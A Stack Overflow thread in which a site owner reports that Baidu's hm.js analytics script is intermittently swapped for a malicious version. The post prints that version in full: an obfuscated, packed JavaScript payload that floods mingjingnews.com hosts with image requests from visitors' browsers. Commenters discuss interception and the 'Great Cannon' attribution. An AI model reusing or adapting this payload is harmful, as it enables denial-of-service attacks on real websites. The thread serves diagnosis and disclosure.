What is randomly replacing Baidu TongJi (Analytics)'s Javascript code to make DDOS attack on websites on browser?
Update:

It seems that different hm.js (Baidu TongJi JS library) are loaded. When no DDOS attack is observed, a standard hm.js is loaded; when there is a DDOS, a totally different hm.js is loaded. I am suspecting the Great Firewall of China is altering the code.

This is the hm.js that has been modified to launch DDOS:

// the following code launches DDOS against sites like mingjingnews.com

eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    }
    ;
    if (!''.replace(/^/, String)) {
        while (c--)
            d[e(c)] = k[c] || e(c);
        k = [function(e) {
            return d[e]
        }
        ];
        e = function() {
            return '\\w+'
        }
        ;
        c = 1;
    }
    ;while (c--)
        if (k[c])
            p = p.replace(new RegExp('\\b' + e(c) + '\\b','g'), k[c]);
    return p;
}('c((/15\\/([\\d]+)/16.17(l.A.D.E())[1]>=12)&&(l.A.D.E().14("18")<0)){3 G=1c;3 p=[\'i://1d.o.j/\',\'i://1e.o.j/\',\'i://19.o.j/\',\'i://1a.1b.j/\',\'i://S.o.j/U/Y/Z.11\'];3 J=V;3 n=W;3 N=10;3 v=1;g u(){3 a=e 7();H 7.X(a.T(),a.1w(),a.1x(),a.1v(),a.P(),a.L())/R}h.C("F")[0].I="<1t 1u=\\"B\\" 1y=\\"1C-B\\">"+h.C("F")[0].I;3 6=[];3 f=[];3 x=5;3 b=[];3 9=[];3 w=\'\';3 m=0;g q(2){3 8=6[2];c(8!=5){h.z.1B(8)}6[2]=5;c(m<J&&9[2]-x<G){O(\'s(\'+2+\')\',(9[2]-b[2])>n?n:(9[2]-b[2]))}}g Q(2){c(6[2]==5){H}c(6[2].1j){l.y(f[2]);9[2]=e 7().k();q(2)}1k{c(e 7().k()-b[2]>n){l.y(f[2]);q(2)}}}g s(2){8=h.z.1q(h.1r(\'1m\'));w=p[u()%p.1o];8.1n=w+\'?t=\'+u()+M.1p(M.1l()*1h);8.1g.1f=\'1i\';6[2]=8;b[2]=9[2]=e 7().k();f[2]=1s("Q("+2+")",1A);m=m+1}g K(){x=e 7().k();1z(3 4=0;4<N;4+=1){6[4]=5;f[4]=5;b[4]=5;9[4]=5;s(4)}}3 r=e 7();O(\'K()\',((v-r.P()%v)*13-r.L())*R)}', 62, 101, '||index|var|ti|null|p_img_list|Date|p_img_tmp|responsetime_list|dt|requesttime_list|if||new|timer_list|function|document|http|com|getTime|window|count|TIMEGAP|mingjingnews|url_list|imgdel|now|imgadd||unixtime|START_CLOCK|url|starttime|clearInterval|body|navigator|referrer|getElementsByTagName|userAgent|toLowerCase|head|MAX_TIME|return|innerHTML|MAX_COUNT|start|getSeconds|Math|THREAD|setTimeout|getMinutes|isImgComplete|1000|bravo1|getFullYear|2017|100000000|500|UTC|01|bravo||html|34|60|indexOf|chrome|gi|exec|edge|tv2|www|mingjingtimes|300000|news2|s3|display|style|100|none|complete|else|random|img|src|length|ceil|appendChild|createElement|setInterval|meta|name|getHours|getMonth|getDate|content|for|50|removeChild|no'.split('|'), 0, {}))

Compare this to the original hm.js code, where no DDOS is present.

Both of these hm.js libraries are coming from the exact same address.


Developer Console in Chrome

I have a site that uses Baidu TongJi (Analytics). Like most other JavaScript libraries, it is done by injecting a line of JavaScript into the HTML.

module.exports = function(id) {
    // The error message reads "please fill in the Baidu Tongji id"
    if (!id) {
        throw new Error('请填写百度统计id');
    }
    // Inject a protocol-relative script tag for hm.js keyed by the site id
    var elm = document.createElement('script');
    elm.src = '//hm.baidu.com/hm.js?' + id;
    var body = document.getElementsByTagName('body')[0];
    body.appendChild(elm);
}

To my horror, once it has initialised, my browser's console and network screen are flooded with around 3000+ network requests to Ming Jing News (fake news according to China's communist government) in just 100 seconds... and it kept going until I stopped it.

I am starting to think this is similar to the last time the Great Wall of China was used to launch attacks on GitHub using Baidu's CDN.

I am currently calling Baidu from outside of China and I am wondering if this is normal... Will the people inside China be spared from this?

Maurits answered 25/8, 2017 at 4:42 Comment(14)
Winsome: Can you clarify what exactly your programming question is?

Maurits: @CodyGray less on programming, more about internet security and internet in China... and using Baidu services from outside of China?

Winsome: Yeah, that was my concern (and some other users who flagged your question). Stack Overflow only deals with programming questions, so I'm not sure if this is a good fit for our site. It's obviously been an interesting question to a number of people, but I'm not sure where else it might be appropriate.

Maurits: @CodyGray Besides programming questions, I think network / security questions are also allowed here on Stack Overflow. Right now on the right sidebar, Stack Overflow is showing me related questions about Baidu / Google analytics, DDOS as well as a full category of "Hot Network Questions".

Myrica: @Maurits - the "related" questions are all programming related. The "hot network questions" are from other sites in the Stack Exchange network. Each of those sites covers different topics than Stack Overflow. For example, this is probably a better fit over on IT Security but it needs a clearer question first. While interesting, I don't really see an answerable question in this post. It's mostly just calling for speculation about who an unknown actor is and we'd just be guessing at that too.

Rayerayfield: Main problem I see with this question is to understand what is replacing the .js, could be a whole bunch of reasons and hacks (could be your site being compromised and not an external provider)... hard to know/ensure/cross-validate.

Maurits: @Rayerayfield it was not related to my site. I finally traced it down to the actual Baidu Analytics JS library that my site uses. From time to time, the code downloaded from their server will be completely different, with instructions to launch a DDOS attack on a number of sites. After a few refreshes, the JS library code will become normal again. I managed to copy down 2 versions of the hm.js served by the Baidu CDN. gist.github.com/williamli/223033fd95179d966fd2b4ce4543cfbb

Rayerayfield: @Maurits the code you're downloading is different, I can't tell if I can be sure you're really downloading from Baidu server or if your workstation is compromised in some way, where a botnet could override DNS information to make your browser get an attack lib instead (one of many ways, for the sake of example)

Maurits: @Rayerayfield what do you think I can do to see where the attack came from? I can try and find the actual IP the code was pulled from.

Maurits: @AJHenderson let me try and update the question.

Myrica: Is there a possibility of loading the js via https? Checking the SSL cert (and signing authority) for the provider of the information would allow tying it directly to Baidu, but without that, it could be anyone along the way.

Maurits: @AJHenderson good suggestion. Let me force it to use https and see.

Rayerayfield: I can't repro, I assume the id is specific to your site and the lib doesn't download without a valid one (I get 0 length responses only trying to download it)

Maurits: @AJHenderson Right now everything seems fine. They only replace my hm.js (baidu) code from time to time and it seems they are not in attack mode right now. I will post back here once my code is being swapped again and then I will try to get SSL / IP info and will try enforcing a https connection.

As suggested by a now deleted answer by kos, this is a (relatively) new form of attack employed by China. It was made famous by an attack on GitHub back in 2015. This form of attack is now known as "Great Cannon".

Details are available on Brian Krebs's security blog.

The Great Cannon

Maurits answered 25/8, 2017 at 15:3 Comment(0)
